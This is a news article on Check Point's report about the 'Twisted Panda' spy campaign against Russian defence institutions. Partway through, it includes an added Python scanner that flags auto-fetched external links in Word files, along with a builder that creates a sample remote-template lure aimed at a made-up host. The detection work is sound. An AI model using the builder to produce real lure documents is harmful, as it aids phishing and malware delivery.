Spy Campaign Twisted Panda
According to security researchers at Check Point Research (CPR), the attackers use spear-phishing emails and other social-engineering techniques, posing as the Russian Ministry of Health, to go after sensitive information held by Russian state institutions. The emails intercepted by CPR carried malicious documents whose file names used Western sanctions against Russia as a lure. The Israeli researchers attribute the espionage campaign to Chinese state-sponsored actors because the tactics, techniques and procedures of this operation overlap substantially with those of advanced, long-standing Chinese espionage groups, including APT10 and Mustang Panda. Check Point therefore calls the campaign Twisted Panda and stresses that it is still active.
CPR has identified three victims, two in Russia and one in Belarus. The Russian victims belong to a holding company within the state-owned Russian defence conglomerate Rostec Corporation; that holding is Russia's largest in the radio-electronics industry. The Russian victims' main business is the development and manufacture of electronic-warfare systems, military and special-purpose radio-electronic on-board equipment, airborne radar stations and state identification (identification friend or foe) systems. The research facilities also work on avionics for civil aviation, a range of civilian products such as medical equipment, and control systems for the energy, transport and mechanical-engineering sectors.
On March 23, the phishing emails carried the subject line "List of persons under US sanctions for invading Ukraine", a link to an attacker-controlled website that imitated the Russian Ministry of Health, including its official title and seal, and a malicious document as an attachment. On the same day, another email went to an unknown institution in Belarus with the subject "US spread of deadly pathogens in Belarus".
The attackers evaded detection for almost eleven months because they used new, previously unknown tools: a sophisticated multi-layer loader and a backdoor that CPR has named SPINNER. The chain starts with a specially crafted spear-phishing email to the target, carrying a document that uses the Western sanctions against Russia as a lure. When the victim opens the document, it downloads malicious code from the attackers' server, which installs the backdoor on the victim's computer and runs it silently. The backdoor collects information about the infected machine and sends it to the attackers, who can then use it to execute further commands on the computer or to harvest confidential data from it on an ongoing basis.
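The article does not say by which mechanism the lure document fetched its payload on open. A check that practitioners commonly run on Office lures of this kind is to list every relationship in the OOXML package whose target lies outside the file, because an external attached template, OLE object, frame or linked image is resolved by Word while the document loads, whereas a hyperlink is only fetched on click. The following is an added example written for this page; it is not Check Point's code and was not derived from the campaign's samples. It builds a constructed .docx in memory and the template URL, hostnames and part names in it are made up.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OPC relationship namespace used by every *.rels part in an OOXML package.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types that Word resolves automatically while loading the file,
# i.e. the target is fetched without the user clicking anything. A hyperlink
# is also TargetMode="External" but is only followed on click, so it is
# reported but not flagged as auto-fetched.
AUTO_FETCH = {"attachedTemplate", "oleObject", "frame", "subDocument", "image"}


def external_targets(docx_bytes):
    """Return (rels_part, relationship_type, target, auto_fetch) for every
    relationship with TargetMode="External" anywhere in the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((name, rtype, rel.get("Target", ""), rtype in AUTO_FETCH))
    return found


def is_suspicious(docx_bytes):
    """True when at least one external target would be fetched on open."""
    return any(auto for _, _, _, auto in external_targets(docx_bytes))


def build_sample_docx(template_url=None):
    """Construct a minimal .docx in memory (constructed test data, not a real
    lure). If template_url is given, the settings part points its attached
    template at that external URL, the shape a remote-template lure takes."""
    parts = {
        "[Content_Types].xml":
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/></Types>',
        "_rels/.rels":
            f'<Relationships xmlns="{RELS_NS}">'
            f'<Relationship Id="rId1" Type="{OFFICE_REL}officeDocument" Target="word/document.xml"/>'
            '</Relationships>',
        "word/document.xml":
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            '<w:body><w:p/></w:body></w:document>',
        # A benign, click-only external hyperlink alongside the internal settings link.
        "word/_rels/document.xml.rels":
            f'<Relationships xmlns="{RELS_NS}">'
            f'<Relationship Id="rId1" Type="{OFFICE_REL}settings" Target="settings.xml"/>'
            f'<Relationship Id="rId2" Type="{OFFICE_REL}hyperlink" '
            'Target="https://minzdrav.example.invalid/" TargetMode="External"/>'
            '</Relationships>',
        "word/settings.xml":
            '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
            'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
            + ('<w:attachedTemplate r:id="rId1"/>' if template_url else "")
            + '</w:settings>',
    }
    if template_url:
        parts["word/_rels/settings.xml.rels"] = (
            f'<Relationships xmlns="{RELS_NS}">'
            f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
            f'Target="{template_url}" TargetMode="External"/></Relationships>'
        )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in parts.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    # Hypothetical lure URL; the host does not exist.
    lure = build_sample_docx("http://lure.example.invalid/template.dotm")
    for part, rtype, target, auto in external_targets(lure):
        print(f"{'AUTO-FETCH' if auto else 'on-click  '} {rtype:<17} {target}  ({part})")
    print("suspicious:", is_suspicious(lure))
```

Run it against a real attachment with `external_targets(open(path, "rb").read())`; a hit on attachedTemplate, oleObject, frame, subDocument or a linked image pointing at a host you do not control is worth detonating in a sandbox before the user ever opens the file. Zipped macro-enabled formats (.docm, .dotm, .xlsx, .pptx) use the same package layout, so the scanner applies unchanged.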
Itay Cohen, Head of Research at Check Point Software Technologies: “We have uncovered an ongoing espionage operation against Russian military research facilities, conducted by experienced and sophisticated hackers supported by China. Our investigation shows that this is part of a larger campaign that has been going on for about a year against facilities related to Russia. We detected two targeted attacks in Russia and against a facility in Belarus. Probably the most clever part of the campaign is the social engineering component, because the coordination of the attacks and the baits used are sophisticated. From a technical point of view, the quality of the tools and their obfuscation is above average even for APT groups. I believe that our results are further proof that espionage is a systematic and long-term effort in the service of China’s strategic goals to achieve technological superiority. In this investigation, we have seen how state-backed Chinese attackers are exploiting the ongoing war between Russia and Ukraine and using advanced tools against a partner that is actually considered strategic, namely Russia.”